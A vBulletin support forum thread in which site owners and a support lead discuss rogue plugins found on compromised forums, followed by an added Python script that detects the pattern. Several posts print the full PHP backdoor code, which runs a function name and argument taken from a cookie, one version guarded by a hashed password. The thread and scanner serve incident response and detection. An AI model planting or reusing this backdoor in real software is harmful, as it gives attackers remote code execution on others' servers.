Is This a Default Plugin?

  • reefland
    Senior Member
    • Sep 2000
    • 1131

    Is This a Default Plugin?

    vbCMS Global Thread Cache

    Code:
    /* vBCMS Global Thread Cache */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
    Wondering if this is related to the vbseo security update. I noticed this plugin after upgrading to 4.1.10 but Brian at vbseo says it looks suspicious.
    Nation of Blue - Kentucky Wildcats Sports


    Some CMS Goodness: Add Avatar to Article
  • Loco.M
    Senior Member
    • Mar 2005
    • 4319
    • 3.5.x

    #2
    I'm interested to know as well so it's something I can check on client sites.
    -- Web Developer for hire
    ---Online Marketing Tools and Articles


    • reefland
      Senior Member
      • Sep 2000
      • 1131

      #3
      Further discussion at vbseo says it is not a part of the default package and should be removed.

      • Loco.M
        Senior Member
        • Mar 2005
        • 4319
        • 3.5.x

        #4
        Originally posted by reefland
        Further discussion at vbseo says it is not a part of the default package and should be removed.
        I saw that, I did some google searching and the only info I found was it listed on Arabic sites.

        • Wayne Luke
          vBulletin Technical Support Lead
          • Aug 2000
          • 73981

          #5
          It should be removed. One thing I've noticed lately is once someone gets into a site, via whatever means, they are more likely to install a backdoor. This looks to be such an occurrence.

          However, vbulletin_collapse is a valid cookie. Usually looks like this: vbulletin_collapse=c_cat134 c_cat115. Tells the system what areas you have collapsed. Since the collapsing is done by CSS and javascript, there is no real need to have this value in PHP or cached in PHP. Most likely they are creating fake cookies and executing code via the $m variable.

          And my previously published checks for compromises will not check for this plugin via Query. I'll update the protocols.
          Translations provided by Google.

          Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API


          • Loco.M
            Senior Member
            • Mar 2005
            • 4319
            • 3.5.x

            #6
            Thanks for confirming Wayne Luke

            • reefland
              Senior Member
              • Sep 2000
              • 1131

              #7
              Time to watch the admin log...

              • Talaturen
                New Member
                • Dec 2005
                • 12
                • 3.8.x

                #8
                Is there any way we can see how this plugin was added?


                • Archaic
                  Senior Member
                  • Dec 2002
                  • 145
                  • 3.8.x

                  #9
                  Since it seems people have reported over on vBSEO that it's come back even after fixing that hole....if this isn't coming from vBSEO, then should we conclude at this stage that the exploit that's being used is something that's a bug in vBulletin itself?

                  Originally posted by reefland
                  Time to watch the admin log...
                  The plugin was added on my forums, however when I checked the admin log on plugin.php for the past month or so, I didn't see anything in there I didn't do myself. Not sure it's going to show.
                  Last edited by Archaic; Mon 23 Jan '12, 12:30pm.
                  神出鬼没 - shin shutsu ki botsu

                  Webmaster, Bulbagarden / Bulbapedia


                  • Wayne Luke
                    vBulletin Technical Support Lead
                    • Aug 2000
                    • 73981

                    #10
                    Originally posted by Talaturen
                    Is there any way we can see how this plugin was added?
                    Plugins should be logged in the Admin Log. However if you give access to it all the time, they can be deleted.

                    • MK_1
                      New Member
                      • Mar 2009
                      • 28

                      #11
                      I found a plugin called "vBulletin Templates Cookie Caching":
                      PHP Code:
                      /* vBulletin Templates Cookie Caching */
                      $vbr="hnmeesht";$vbh="4a74242f98a955c5b99215f95e7c3f20";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 
                      Join in the 2-Wheel-Planet Advent calendar:

                      2WP Advent Calendar


                      • Wayne Luke
                        vBulletin Technical Support Lead
                        • Aug 2000
                        • 73981

                        #12
                        Originally posted by Archaic
                        If this isn't coming from vBSEO, then should we conclude at this stage that the exploit that's being used is something that's a bug in vBulletin itself?
                        A conclusion like that would only be supported with proof of some sort. Looks like your vBulletin is up to date. Looks like you stayed up to date with patches. Your Admin CP isn't behind .htaccess though.

                        Are all your addons up to date?

                        Do you have anything stored in the searchprefs field of the usertextfield table?

                        • MK_1
                          New Member
                          • Mar 2009
                          • 28

                          #13
                          I found something in the admin log:
                          54131 admin 20:04, 20.01.2012 plugin.php
                          54130 admin 20:04, 20.01.2012 plugin.php update
                          54129 admin 20:04, 20.01.2012 plugin.php add
                          54128 admin 20:04, 20.01.2012 plugin.php
                          The incredible thing is that I really was active in the admincp minutes later... 20:05 I did some template changes...

                          • Wayne Luke
                            vBulletin Technical Support Lead
                            • Aug 2000
                            • 73981

                            #14
                            Originally posted by MK_1
                            I found a plugin called "vBulletin Templates Cookie Caching":
                            PHP Code:
                            /* vBulletin Templates Cookie Caching */
                            $vbr="hnmeesht";$vbh="4a74242f98a955c5b99215f95e7c3f20";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 

                            Same as the plugin above but different cookie values.

                            • DelDrago
                              Member
                              • Nov 2010
                              • 34
                              • 4.2.X

                              #15
                              This "vbCMS Global Thread Cache" has appeared on my site as well.

                              Should I conclude that my site has been hacked?? If so, what measures should I take to clean up the damage? Please advise.
                              Fantasy Writing Forum - Mythic Scribes
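
A static check for the pattern Wayne Luke describes in #5, run over the two plugin bodies posted in this thread: it flags PHP that feeds a request superglobal to preg_match() and then calls one of the captured groups as a function. This is an added example, not part of the original thread or of any vBulletin tooling; the names scan_plugin and scan_all and the benign control plugin are constructed for illustration.

```python
import re

# preg_match() whose subject is a request superglobal and whose captures land in $var.
CAPTURE = re.compile(
    r"preg_match\s*\([^;]*?\$_(?P<src>COOKIE|GET|POST|REQUEST)"
    r"\s*\[\s*[\"'](?P<key>[^\"']+)[\"']\s*\]\s*,\s*\$(?P<var>\w+)\s*\)")

def scan_plugin(php_code):
    """Report calls of the form $var[N](...) where $var holds request-derived captures."""
    findings = []
    for cap in CAPTURE.finditer(php_code):
        # A capture group used as a function name: $m[1](...), $m[2](...), ...
        call = re.compile(r"\$" + re.escape(cap["var"]) + r"\s*\[\s*(\d+)\s*\]\s*\(")
        for hit in call.finditer(php_code):
            findings.append({"input": "$_%s[%s]" % (cap["src"], cap["key"]),
                             "callee": "$%s[%s]" % (cap["var"], hit[1])})
    return findings

def scan_all(plugins):
    """Map plugin title -> findings, keeping only plugins with at least one finding."""
    results = {title: scan_plugin(code) for title, code in plugins.items()}
    return {title: found for title, found in results.items() if found}

# Plugin bodies as posted in this thread, plus one constructed benign control.
PLUGINS = {
    "vbCMS Global Thread Cache": (
        r'(isset($_COOKIE["vbulletin_collapse"]) && '
        r'preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))'
        r'?$m[1]($m[2]):chr(20);'),
    "vBulletin Templates Cookie Caching": (
        r'$vbr="hnmeesht";$vbh="4a74242f98a955c5b99215f95e7c3f20";'
        r'isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);'
        r'(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")'
        r'&&isset($_COOKIE["vbcache"])'
        r'&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)'
        r'&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);'),
    # Constructed: reads the same cookie but only uses the capture as data.
    "Collapse counter (constructed control)": (
        r'$n = preg_match("/c_cat(\d+)/", $_COOKIE["vbulletin_collapse"], $m) '
        r'? intval($m[1]) : 0;'),
}

if __name__ == "__main__":
    for title, found in scan_all(PLUGINS).items():
        print(title, found)
```

Run it over the PHP body of every plugin exported from your own database; a hit means the plugin needs manual review, and an empty result does not prove a site is clean.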

